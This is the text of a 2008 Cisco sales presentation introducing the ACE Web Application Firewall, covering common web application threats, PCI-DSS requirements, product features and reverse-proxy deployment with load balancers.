Upload
others
View
6
Download
0
Embed Size (px)
Citation preview
© 2007 Cisco Systems, Inc. All rights reserved. Cisco ConfidentialSession IDPresentation_ID 1
Web Application Security
- Cisco ACE Web App FirewallIntroduction
Ong Poh Seng Technical Specialist
14th May 2008
© 2007 Cisco Systems, Inc. All rights reserved. Cisco ConfidentialSession IDPresentation_ID 2
Agenda
Application Security Challenges
Introducing Cisco ACE Application Firewall
Deployment Use Cases
Summary / Q&A
© 2007 Cisco Systems, Inc. All rights reserved. Cisco ConfidentialSession IDPresentation_ID 3
The Evolution of IntentA Shift to Financial Gain
Threats becoming increasingly difficult to detect and mitigateApplications are the primary targets
THR
EAT
SEVE
RIT
Y
1990 1995 2000 2005 WHAT’S NEXT?
FINANCIAL:Theft & Damage
NOTORIETY:Viruses and Malware
VANDALISM:Basic Intrusions and Viruses
2007
© 2007 Cisco Systems, Inc. All rights reserved. Cisco ConfidentialSession IDPresentation_ID 4
Applications: the Weak Link to the Crown Jewels
Customer Confidentiality
Customer Confidentiality
Identity TheftIdentity Theft
Data LeakageData Leakage
Service DisruptionService Disruption
Applications Give Unprecedented Access to Critical Business Data
© 2007 Cisco Systems, Inc. All rights reserved. Cisco ConfidentialSession IDPresentation_ID 5
The Effect of Application Attacks
Web Application Threats• Cross-site scripting• SQL injection• Command injection• Cookie and session poisoning• Parameter and form tampering• Buffer overflow• Directory traversal and forceful
browsing• Cryptographic interception• Cookie snooping• Authentication hijacking• Error-message interception• Attack obfuscation• Application platform exploits• DMZ protocol exploits• Security management attacks• Day-zero attacks
Theft of customer dataAccess to unpublished pagesUnauthorized application
accessPassword theftModification of dataDisruption of service Website defacement Recovery and cleanup
© 2007 Cisco Systems, Inc. All rights reserved. Cisco ConfidentialSession IDPresentation_ID 6
Traditional network firewalls are blind to web application attacks
Firewall
Ports 80 & 443 open
Unfiltered HTTP Traffic
WebClient
WebServer
Application
Application
DatabaseServer
© 2007 Cisco Systems, Inc. All rights reserved. Cisco ConfidentialSession IDPresentation_ID 7
75% of Attacks Focused Here
Custom Web ApplicationsCustomized Packaged AppsInternal and 3rd Party Code
Business Logic & Code
Network
OperatingSystems
DatabaseServers
OperatingSystems
ApplicationServers
OperatingSystems
WebServers
Network Firewall
IDSIPS
No Signatures
or Patches
No magic signatures or patches for your custom PHP script
Focus of today’s attacks
© 2007 Cisco Systems, Inc. All rights reserved. Cisco ConfidentialSession IDPresentation_ID 8
PCI-DSS 6.5 & 6.6
Two sections of Payment Card Industry Data Security Standard focus on web application security: 6.5 and 6.6
Section 6.6 mandates you install a Web App Firewall by end of June 08 to protect your applications against OWASP Top 10 attacks
© 2007 Cisco Systems, Inc. All rights reserved. Cisco ConfidentialSession IDPresentation_ID 9
OWASP - 2007 Top Ten Attack List
Source: WhiteHat Security
OWASP = Open Web App Security Project
© 2007 Cisco Systems, Inc. All rights reserved. Cisco ConfidentialSession IDPresentation_ID 10
Cross-Site Scripting (XSS) attacks
What is it?A malicious script is echoed back into HTML returned from a trusted web site. The scripts executes locally on the client.Extremely widespread – some experts estimate 70%-80% of websites are vulnerable
What are the implications?Web Site DefacementSession IDs stolen (cookies exported to hacker’s site)Browser security compromised – control given to hackerAll data sent between client and server potentially hijacked
© 2007 Cisco Systems, Inc. All rights reserved. Cisco ConfidentialSession IDPresentation_ID 11
The XSS attack process
© 2007 Cisco Systems, Inc. All rights reserved. Cisco ConfidentialSession IDPresentation_ID 12
Why Not Just Fix the Code?
Every 1000 lines of code averages 15 critical security defects.(U.S. Department of Defense)
• Developers typically focus on new functions, not bugs.
• It is too expensive to fix the security bugs.
The average custom business application has 150,000 to 250,000 lines of code.(Software Magazine)
The average security defect takes 75 minutes to diagnose and 6 hours to fix. (5-year Pentagon Study)
© 2007 Cisco Systems, Inc. All rights reserved. Cisco ConfidentialSession IDPresentation_ID 13
Cisco ACE Web Application Firewall
© 2007 Cisco Systems, Inc. All rights reserved. Cisco ConfidentialSession IDPresentation_ID 14
SDN Solutions for Business Security
Cisco SelfCisco Self--Defending Network: Defending Network: Best of Breed Security in a Systems ApproachBest of Breed Security in a Systems Approach
Enforce business policies and protect critical assets
Decrease IT administrative burden and reduce TCO
Reduce security and compliance IT risk
Enforce business policies and protect critical assets
Decrease IT administrative burden and reduce TCO
Reduce security and compliance IT risk
System ManagementPolicy—Reputation—Identity
© 2007 Cisco Systems, Inc. All rights reserved. Cisco ConfidentialSession IDPresentation_ID 15
Advanced Visibility and Control Application Security Enhancements
Cisco SelfCisco Self--Defending Network: Defending Network: Best of Breed Security in a Systems ApproachBest of Breed Security in a Systems Approach
System ManagementPolicy—Reputation—Identity
Web Application FirewallWeb Application Firewall
© 2007 Cisco Systems, Inc. All rights reserved. Cisco ConfidentialSession IDPresentation_ID 16
Bullet-Proof Security for YourCustom ApplicationsOffers an extensive set of Cisco validated signatures for known malicious attack patterns.Provides broad compliance for PCI DSS regulationsUnderstands Web applications to allow only legitimate traffic.Human assisted learning removes the guesswork from your security configuration.
Stop Application HackingDramatically reduce exposure to costly Web attacks.Deploy secure Web projects in a fraction of the time and cost.Simplify ongoing Web security management.
The Industry’s First Integrated Web and XML
Application Firewall
The Cisco ACE Web Application Firewall
© 2007 Cisco Systems, Inc. All rights reserved. Cisco ConfidentialSession IDPresentation_ID 17
ACE Web Application Firewall in a nutshell
• Addresses PCI DSS 6.5 and 6.6 requirements – secure your customers from most OWASP Top 10 attacks
• Signature-based approach: deny all known bad, permit the good
• Factory-shipped default PCI profile for instant deployment
• Ability to switch applications in and out of protection at the flip of a switch thanks to monitor mode
• Builds on top of fully resilient hardware platform (dual PS and disk)
• Comprehensive security for XML and HTML applications
• Heavy focus on ease of use, audit trail and attack forensic
• Aggressive price/performance price point (9000 TPS, 30K concurrent connections)
© 2007 Cisco Systems, Inc. All rights reserved. Cisco ConfidentialSession IDPresentation_ID 18
Network Deployment Examples
© 2007 Cisco Systems, Inc. All rights reserved. Cisco ConfidentialSession IDPresentation_ID 19
The Cisco ACE WAF is a full reverse proxy
This means that you would typically modify your DNS entry for www.site.com to point clients to the IP of the WAF for www.site.com (or better yet, to a virtual IP on your load balancer)
The WAF relies on the network for HA/resiliency
Therefore, a load balancer front-ending the WAF is a really good idea and serves two purposes: scaling WAF is easy as you can “hide” many WAFs behind a VIP on the load balancer; providing resiliency comes naturally with the load balancer
Be aware that the WAF does not handle traffic other than HTTP (HTML + XML). If it receives telnet, ssh, ftp, etc. it will drop that traffic. That makes the role of the load balancer even more important to selectively send traffic to the WAF.
Network Deployment Notes
© 2007 Cisco Systems, Inc. All rights reserved. Cisco ConfidentialSession IDPresentation_ID 20
Typical Network Deployment
Internet
WAF_1 WAF_2
www1 www4…
Clients resolve www.site.com to a VIP residing on the ACEThe ACE picks a WAF and sticks the session to itThe WAF chooses a policy based on the Host headerWhen done with the inspection, the WAF sends the packet out to an internal VIPThat internal VIP represents the actual www servers, ACE performs the LB decision and sticks the WAF session to one real server
© 2007 Cisco Systems, Inc. All rights reserved. Cisco ConfidentialSession IDPresentation_ID 21
Cisco ACE Web Application Firewall Deployment
Web
-Ena
bled
App
licat
ions
Identity Management Systems
Applications
Network Firewall
DMZ Data Center
PortalCisco® ACE Application
Switch
Cisco ACE Web Application
Manager
Internet
Cisco ACE Web Application
Firewall
Cisco ACE Web Application
Firewall
Cisco ACE Application
Switch
Web Client
© 2007 Cisco Systems, Inc. All rights reserved. Cisco ConfidentialSession IDPresentation_ID 22
Cisco ACE XML Firewall DeploymentXM
L Web Services
Aw
are Applications
Identity Mgt Systems
External XMLWeb Services
Consumers
Internet
Network Firewall
ACEXML
Gateway
DMZ DATA CENTER
Portal ACE XMLGateway
ACE XMLGateway
ACE
Key Use Cases: Perimeter Security, XML Acceleration and Offload,Web 2.0, Web Service Integration
ACE XMLManager
© 2007 Cisco Systems, Inc. All rights reserved. Cisco ConfidentialSession IDPresentation_ID 23
Cisco ACE Web Application Firewall SummaryFull-featured Web application firewall with integrated XML firewall
Extend protection for traditional HTML-based Web applications to modern XML-enabled Web services applications.
Access enforcementSecure applications from unauthorized access with AAA enforcement mechanism
Positive and Negative security enforcementEnjoy the best of both worlds by keeping bad traffic patterns out and allowing only good traffic through.
Human assisted learningDeploy policies and profiles in monitoring mode to prevent application downtime due to false positives typical in an automated learning environment.
Policy-based provisioningAchieve increased developer productivity and ease of deployment with sophisticated GUI, rollback, and versioning capabilities.
Defense-in-Depth Should Include a Web Application Firewall that Can Quickly, Effectively, and Cost-Effectively Block Attacks at Layers 5–7.
© 2007 Cisco Systems, Inc. All rights reserved. Cisco ConfidentialSession IDPresentation_ID 24